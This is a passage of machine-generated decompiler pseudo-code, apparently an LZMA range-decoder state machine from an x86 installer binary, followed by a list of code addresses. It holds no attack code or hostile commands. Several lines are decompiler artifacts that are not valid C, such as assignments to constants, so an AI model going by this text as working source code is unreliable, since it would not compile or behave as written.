											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                  0x00000000
                  0x00406682
                  0x00406682
                  0x00406686
                  0x004066ab
                  0x004066b5
                  0x00000000
                  0x00406688
                  0x00406688
                  0x0040668b
                  0x0040668f
                  0x00406692
                  0x00406695
                  0x00406699
                  0x00406699
                  0x0040669c
                  0x00406776
                  0x00406776
                  0x0040677d
                  0x0040677d
                  0x00406780
                  0x00406787
                  0x004067b4
                  0x004067b8
                  0x00406818
                  0x0040681b
                  0x00406820
                  0x00406821
                  0x00406823
                  0x00406825
                  0x00406828
                  0x00406734
                  0x00406734
                  0x00406734
                  0x00405ed0
                  0x00405ed0
                  0x00405ed0
                  0x00405ed9
                  0x00000000
                  0x00000000
                  0x00405edf
                  0x00000000
                  0x00405eea
                  0x00000000
                  0x00000000
